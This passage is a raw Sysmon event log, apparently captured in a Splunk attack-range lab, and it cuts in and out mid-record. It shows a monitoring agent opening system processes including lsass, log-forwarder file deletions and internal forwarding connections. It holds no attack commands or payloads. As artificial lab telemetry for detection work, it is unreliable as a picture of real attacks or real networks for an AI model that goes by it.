Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015945Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015944Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015943Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.724{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015942Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015941Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.710{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015940Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.685{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015939Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.669{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015938Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.656{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015937Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.650{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015936Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.641{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015935Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.604{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015934Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.595{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015933Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.587{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015932Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.577{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015931Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015930Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.561{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015929Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015928Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 23542300x800000000000000015927Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.051{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=052A6B339D039F306FB796728C5A729C,SHA256=D53FB37E92418526B655B4078B934230FC3261F0FEDA9C7EAF983DC3215B8C9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015960Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:00.114{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50072-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015959Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:03.175{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FAF5CE4C63FAFC9213D00F245D2C332,SHA256=1727F1DD207354A068DF0D87949958C543C0913A0E6E6B302E171E57DB57F6E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:03.023{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAEFE74C76DDAABBEF6509DB23496587,SHA256=3F2B32766A9EBCD3EC7580F4EA9937B8C6A061165A10D32ED85D6D9EBB225A5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015962Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:04.421{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A3CB4BD92E72260A4C30B7A24F8722,SHA256=C0328C0E7B9060024DA50C5B79DCAA64F067CADE1194C21FF4411CA86B2A2F72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:04.110{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E49039B2E75C789F46F32314B057E19,SHA256=C3AD37BB167CC711032A9C17F33D99B1417E4BACB6CE1E1BE04234B9EC684F5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015961Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:04.001{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015963Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:05.512{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F2C699398615F6E320FF51D4156432,SHA256=A7B675EE61C8D3B4E39DDD5C79A6335E247CF634B3FC1A87AF90D43A2495C80F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:03.563{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56273-false10.0.1.12-8000- 23542300x800000000000000041225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:05.191{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02917B5ED0B85891931BE24131E04AC4,SHA256=C73DDC0B5FCA9FD03028AD7C450F8CE7D3486308FDDF399B839A13299A9913B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015966Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:06.610{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F4C2976F92F571827D8B27F3C1A55E2,SHA256=8ED9A74B97A4A6C1972D20A7A4006CCCA6AF8826398C1FF95E8EC0574ECF13C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:06.265{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=217BF0DECFE9032D36327552294D9A86,SHA256=FA19AC851F25F2DB0444051CDF844BA59C57F288D6D898529DBBA48F8C38223C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015965Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:06.416{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-031MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015964Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:03.865{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50073-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000041228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:07.338{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9529A8D76D777959985A25CE7A63A36,SHA256=028D4F165D5BC77B5BC81141F566DD72FE72BFB23FA6B5CE8B923870CC31F8C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015968Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:07.707{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9D287E91960DAED90B67084D3F8FA62,SHA256=A0859D0B51187964B84A6B97FE8FD5D948E0AFCDAE8ED8957694A0004530739F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015967Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:07.419{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-032MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015970Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:08.786{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53545FE670D7EC338D452FA9F9803339,SHA256=11FDD7F09815280206DBC25B20B97738E28FE454ACFFA56BE639E5EE21B0DBD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:08.399{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247D9B136B597C61E38E74BBFBA10B21,SHA256=C1368EB075D7EC86113FC95CB085F2281BD02909FE5F9F44AE5D293089C6A84C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015969Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:06.044{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50074-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015971Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:09.880{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D701C34646FA72CE8E4A309BD460090,SHA256=9A2549234ED74EF4F6BA9BAC9E82C3A7E31895135A9B59DB92CD5033196D8A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:09.491{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program 